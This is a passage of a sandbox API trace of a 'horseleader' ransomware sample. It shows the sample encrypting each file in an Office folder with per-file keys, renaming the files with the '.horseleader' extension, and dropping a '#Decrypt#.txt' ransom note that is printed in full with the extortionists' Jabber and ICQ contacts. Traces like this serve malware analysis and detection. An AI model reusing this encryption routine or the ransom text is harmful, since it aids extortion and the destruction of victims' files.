(lpString=".testttjffg") returned 11 [0245.637] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL", lpSrch=".testttjffg") returned 0x0 [0245.637] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0245.637] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0245.637] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\basmla.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0245.637] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 77 [0245.637] StrStrW (lpFirst="BASMLA.XSL", lpSrch=".txt") returned 0x0 [0245.637] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=227311) returned 1 [0245.638] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.638] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0245.640] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.640] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0245.641] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x193f7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.641] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0245.642] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.642] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0245.642] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x327ef, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.642] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0245.644] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.644] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0245.644] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.644] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0245.644] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0245.644] CloseHandle (hObject=0x1a4) returned 1 [0245.644] GetProcessHeap () returned 0x780000 [0245.644] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0245.644] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL.horseleader") returned 89 [0245.645] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\basmla.xsl"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\basmla.xsl.horseleader")) returned 1 [0245.645] GetProcessHeap () returned 0x780000 [0245.645] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0245.645] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11f34c00, ftCreationTime.dwHighDateTime=0x1c62260, ftLastAccessTime.dwLowDateTime=0x5f42f7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x11f34c00, ftLastWriteTime.dwHighDateTime=0x1c62260, nFileSizeHigh=0x0, nFileSizeLow=0x377ef, dwReserved0=0x33bd0262, dwReserved1=0xcc71a064, cFileName="BASMLA.XSL", cAlternateFileName="")) returned 0 [0245.646] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0245.646] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\#Decrypt#.txt") returned 80 [0245.646] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.647] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0245.647] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0245.648] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0245.648] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0245.648] CloseHandle (hObject=0x158) returned 1 [0245.648] GetProcessHeap () returned 0x780000 [0245.648] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.648] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93e94600, ftCreationTime.dwHighDateTime=0x1ca9120, ftLastAccessTime.dwLowDateTime=0x583906f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x93e94600, ftLastWriteTime.dwHighDateTime=0x1ca9120, nFileSizeHigh=0x0, nFileSizeLow=0x1b180, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="METCONV.DLL", cAlternateFileName="")) returned 1 [0245.648] lstrcmpiW (lpString1="METCONV.DLL", lpString2="Windows") returned -1 [0245.648] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.DLL") returned 72 [0245.648] StrStrIW (lpFirst="METCONV.DLL", lpSrch=".horseleader") returned 0x0 [0245.649] lstrcmpW (lpString1="METCONV.DLL", lpString2="#Decrypt#.txt") returned 1 [0245.649] lstrcmpW (lpString1="METCONV.DLL", lpString2="_uninstalling_.png") returned 1 [0245.649] lstrlenW (lpString=".testttjffg") returned 11 [0245.649] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.DLL", lpSrch=".testttjffg") returned 0x0 [0245.649] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.649] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.649] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\metconv.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.651] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.DLL") returned 72 [0245.651] StrStrW (lpFirst="METCONV.DLL", lpSrch=".txt") returned 0x0 [0245.651] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=110976) returned 1 [0245.651] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.652] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.654] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.654] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.656] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xb0c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.656] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.656] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.656] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.657] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x16180, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.657] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.657] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.657] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.657] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.658] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.658] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.658] CloseHandle (hObject=0x158) returned 1 [0245.658] GetProcessHeap () returned 0x780000 [0245.658] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.658] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.DLL.horseleader") returned 84 [0245.659] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\metconv.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\metconv.dll.horseleader")) returned 1 [0245.660] GetProcessHeap () returned 0x780000 [0245.660] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.660] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85f12000, ftCreationTime.dwHighDateTime=0x1c9a11f, ftLastAccessTime.dwLowDateTime=0x69a83910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x85f12000, ftLastWriteTime.dwHighDateTime=0x1c9a11f, nFileSizeHigh=0x0, nFileSizeLow=0x120eb8, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="METCONV.TXT", cAlternateFileName="")) returned 1 [0245.660] lstrcmpiW (lpString1="METCONV.TXT", lpString2="Windows") returned -1 [0245.660] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 72 [0245.660] StrStrIW (lpFirst="METCONV.TXT", lpSrch=".horseleader") returned 0x0 [0245.660] lstrcmpW (lpString1="METCONV.TXT", lpString2="#Decrypt#.txt") returned 1 [0245.660] lstrcmpW (lpString1="METCONV.TXT", lpString2="_uninstalling_.png") returned 1 [0245.660] lstrlenW (lpString=".testttjffg") returned 11 [0245.660] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT", lpSrch=".testttjffg") returned 0x0 [0245.660] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.660] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.661] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\metconv.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.662] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 72 [0245.662] StrStrW (lpFirst="METCONV.TXT", lpSrch=".txt") returned 0x0 [0245.662] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1183416) returned 1 [0245.662] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.662] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.665] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.665] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.667] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x8df5c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.667] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.669] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.669] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.669] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x11beb8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.669] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.675] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.675] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.675] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.676] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.676] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.676] CloseHandle (hObject=0x158) returned 1 [0245.676] GetProcessHeap () returned 0x780000 [0245.676] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.676] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT.horseleader") returned 84 [0245.676] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\metconv.txt"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\metconv.txt.horseleader")) returned 1 [0245.677] GetProcessHeap () returned 0x780000 [0245.677] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.677] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x802a9400, ftCreationTime.dwHighDateTime=0x1caad0b, ftLastAccessTime.dwLowDateTime=0x69c4c990, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x802a9400, ftLastWriteTime.dwHighDateTime=0x1caad0b, nFileSizeHigh=0x0, nFileSizeLow=0x59180, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MOFL.DLL", cAlternateFileName="")) returned 1 [0245.677] lstrcmpiW (lpString1="MOFL.DLL", lpString2="Windows") returned -1 [0245.677] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\MOFL.DLL") returned 69 [0245.677] StrStrIW (lpFirst="MOFL.DLL", lpSrch=".horseleader") returned 0x0 [0245.677] lstrcmpW (lpString1="MOFL.DLL", lpString2="#Decrypt#.txt") returned 1 [0245.677] lstrcmpW (lpString1="MOFL.DLL", lpString2="_uninstalling_.png") returned 1 [0245.677] lstrlenW (lpString=".testttjffg") returned 11 [0245.677] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\MOFL.DLL", lpSrch=".testttjffg") returned 0x0 [0245.677] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.678] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.678] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\MOFL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\mofl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.679] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\MOFL.DLL") returned 69 [0245.679] StrStrW 